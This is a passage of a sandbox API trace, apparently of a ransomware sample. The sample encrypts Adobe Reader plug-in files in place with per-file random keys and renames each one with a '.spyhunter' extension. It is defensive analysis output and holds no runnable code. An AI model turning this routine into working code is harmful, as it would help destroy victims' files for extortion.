lpOverlapped=0x0) returned 1 [0118.478] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.478] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf92c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf92c*=0x2800, lpOverlapped=0x0) returned 1 [0118.479] GetProcessHeap () returned 0x2c0000 [0118.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.479] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.575] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf96c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf92c, lpOverlapped=0x0 | out: lpBuffer=0x25cf96c*, lpNumberOfBytesWritten=0x25cf92c*=0x4, lpOverlapped=0x0) returned 1 [0118.582] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf92c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf92c*=0x30, lpOverlapped=0x0) returned 1 [0118.582] CloseHandle (hObject=0x17c) returned 1 [0118.594] GetProcessHeap () returned 0x2c0000 [0118.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec6058 [0118.595] wnsprintfW (in: pszDest=0x2ec6058, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api.spyhunter") returned 81 [0118.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\digsig.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\digsig.api.spyhunter")) returned 1 [0118.596] GetProcessHeap () returned 0x2c0000 [0118.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6058 | out: hHeap=0x2c0000) returned 1 [0118.596] GetProcessHeap () returned 0x2c0000 [0118.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.596] GetProcessHeap () returned 0x2c0000 [0118.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d6c8 | out: hHeap=0x2c0000) returned 1 [0118.596] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf970 | out: pbBuffer=0x25cf970) returned 1 [0118.596] GetProcessHeap () returned 0x2c0000 [0118.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.596] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf968*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf968*=0x30) returned 1 [0118.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annots.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0118.597] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api") returned 71 [0118.597] StrStrW (lpFirst="Annots.api", lpSrch=".txt") returned 0x0 [0118.597] GetProcessHeap () returned 0x2c0000 [0118.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.597] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf92c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf92c*=0x2800, lpOverlapped=0x0) returned 1 [0118.608] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.608] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf92c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf92c*=0x2800, lpOverlapped=0x0) returned 1 [0118.608] GetProcessHeap () returned 0x2c0000 [0118.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.608] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.608] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf96c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf92c, lpOverlapped=0x0 | out: lpBuffer=0x25cf96c*, lpNumberOfBytesWritten=0x25cf92c*=0x4, lpOverlapped=0x0) returned 1 [0118.622] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf92c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf92c*=0x30, lpOverlapped=0x0) returned 1 [0118.622] CloseHandle (hObject=0x17c) returned 1 [0118.622] GetProcessHeap () returned 0x2c0000 [0118.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.622] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api.spyhunter") returned 81 [0118.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annots.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annots.api.spyhunter")) returned 1 [0118.623] GetProcessHeap () returned 0x2c0000 [0118.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.623] GetProcessHeap () returned 0x2c0000 [0118.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.623] GetProcessHeap () returned 0x2c0000 [0118.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0de60 | out: hHeap=0x2c0000) returned 1 [0118.624] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf968 | out: pbBuffer=0x25cf968) returned 1 [0118.624] GetProcessHeap () returned 0x2c0000 [0118.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.624] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf960*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf960*=0x30) returned 1 [0118.624] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0118.625] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf") returned 96 [0118.625] StrStrW (lpFirst="SignHere.pdf", lpSrch=".txt") returned 0x0 [0118.625] GetProcessHeap () returned 0x2c0000 [0118.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0118.625] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf924, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf924*=0x2800, lpOverlapped=0x0) returned 1 [0118.644] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.644] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf924, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf924*=0x2800, lpOverlapped=0x0) returned 1 [0118.645] GetProcessHeap () returned 0x2c0000 [0118.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0118.645] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.645] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf964*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf924, lpOverlapped=0x0 | out: lpBuffer=0x25cf964*, lpNumberOfBytesWritten=0x25cf924*=0x4, lpOverlapped=0x0) returned 1 [0118.654] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf924, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf924*=0x30, lpOverlapped=0x0) returned 1 [0118.654] CloseHandle (hObject=0x17c) returned 1 [0118.655] GetProcessHeap () returned 0x2c0000 [0118.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.655] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf.spyhunter") returned 106 [0118.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\signhere.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\signhere.pdf.spyhunter")) returned 1 [0118.656] GetProcessHeap () returned 0x2c0000 [0118.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.656] GetProcessHeap () returned 0x2c0000 [0118.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.656] GetProcessHeap () returned 0x2c0000 [0118.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e48c70 | out: hHeap=0x2c0000) returned 1 [0118.658] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf960 | out: pbBuffer=0x25cf960) returned 1 [0118.658] GetProcessHeap () returned 0x2c0000 [0118.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.658] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf958*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf958*=0x30) returned 1 [0118.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0118.659] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf") returned 104 [0118.659] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0118.659] GetProcessHeap () returned 0x2c0000 [0118.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.659] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf91c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf91c*=0x2800, lpOverlapped=0x0) returned 1 [0118.688] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.688] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf91c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf91c*=0x2800, lpOverlapped=0x0) returned 1 [0118.688] GetProcessHeap () returned 0x2c0000 [0118.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.688] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.688] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf95c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf91c, lpOverlapped=0x0 | out: lpBuffer=0x25cf95c*, lpNumberOfBytesWritten=0x25cf91c*=0x4, lpOverlapped=0x0) returned 1 [0118.693] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf91c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf91c*=0x30, lpOverlapped=0x0) returned 1 [0118.693] CloseHandle (hObject=0x17c) returned 1 [0118.693] GetProcessHeap () returned 0x2c0000 [0118.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec6058 [0118.693] wnsprintfW (in: pszDest=0x2ec6058, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf.spyhunter") returned 114 [0118.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standardbusiness.pdf.spyhunter")) returned 1 [0118.694] GetProcessHeap () returned 0x2c0000 [0118.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6058 | out: hHeap=0x2c0000) returned 1 [0118.694] GetProcessHeap () returned 0x2c0000 [0118.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.694] GetProcessHeap () returned 0x2c0000 [0118.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef2d90 | out: hHeap=0x2c0000) returned 1 [0118.694] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf960 | out: pbBuffer=0x25cf960) returned 1 [0118.694] GetProcessHeap () returned 0x2c0000 [0118.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.694] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf958*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf958*=0x30) returned 1 [0118.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0118.724] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO") returned 86 [0118.724] StrStrW (lpFirst="Mcimpp.SUO", lpSrch=".txt") returned 0x0 [0118.725] GetProcessHeap () returned 0x2c0000 [0118.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.725] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf91c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf91c*=0x1e00, lpOverlapped=0x0) returned 1 [0118.748] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffe200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.748] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x25cf91c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf91c*=0x1e00, lpOverlapped=0x0) returned 1 [0118.749] GetProcessHeap () returned 0x2c0000 [0118.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.749] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.749] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf95c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf91c, lpOverlapped=0x0 | out: lpBuffer=0x25cf95c*, lpNumberOfBytesWritten=0x25cf91c*=0x4, lpOverlapped=0x0) returned 1 [0118.749] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf91c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf91c*=0x30, lpOverlapped=0x0) returned 1 [0118.749] CloseHandle (hObject=0x17c) returned 1 [0118.749] GetProcessHeap () returned 0x2c0000 [0118.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0118.750] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO.spyhunter") returned 96 [0118.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.suo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.suo.spyhunter")) returned 1 [0118.751] GetProcessHeap () returned 0x2c0000 [0118.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0118.751] GetProcessHeap () returned 0x2c0000 [0118.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.751] GetProcessHeap () returned 0x2c0000 [0118.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4ad08 | out: hHeap=0x2c0000) returned 1 [0118.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf958 | out: pbBuffer=0x25cf958) returned 1 [0118.762] GetProcessHeap () returned 0x2c0000 [0118.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf950*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf950*=0x30) returned 1 [0118.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\updater.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0118.763] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api") returned 72 [0118.763] StrStrW (lpFirst="Updater.api", lpSrch=".txt") returned 0x0 [0118.763] GetProcessHeap () returned 0x2c0000 [0118.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.763] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf914, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf914*=0x2800, lpOverlapped=0x0) returned 1 [0118.814] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.814] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf914, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf914*=0x2800, lpOverlapped=0x0) returned 1 [0118.814] GetProcessHeap () returned 0x2c0000 [0118.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.814] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.814] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf954*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf914, lpOverlapped=0x0 | out: lpBuffer=0x25cf954*, lpNumberOfBytesWritten=0x25cf914*=0x4, lpOverlapped=0x0) returned 1 [0118.816] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf914, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf914*=0x30, lpOverlapped=0x0) returned 1 [0118.816] CloseHandle (hObject=0x16c) returned 1 [0118.818] GetProcessHeap () returned 0x2c0000 [0118.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0118.818] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api.spyhunter") returned 82 [0118.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\updater.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\updater.api.spyhunter")) returned 1 [0118.819] GetProcessHeap () returned 0x2c0000 [0118.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0118.819] GetProcessHeap () returned 0x2c0000 [0118.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0118.819] GetProcessHeap () returned 0x2c0000 [0118.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44608 | out: hHeap=0x2c0000) returned 1 [0118.819] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf950 | out: pbBuffer=0x25cf950) returned 1 [0118.819] GetProcessHeap () returned 0x2c0000 [0118.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0118.819] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf948*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf948*=0x30) returned 1 [0118.819] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\search.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0118.820] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api") returned 71 [0118.820] StrStrW (lpFirst="Search.api", lpSrch=".txt") returned 0x0 [0118.820] GetProcessHeap () returned 0x2c0000 [0118.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.820] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf90c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf90c*=0x2800, lpOverlapped=0x0) returned 1 [0118.829] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.829] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf90c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf90c*=0x2800, lpOverlapped=0x0) returned 1 [0118.829] GetProcessHeap () returned 0x2c0000 [0118.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.829] SetFilePointerEx 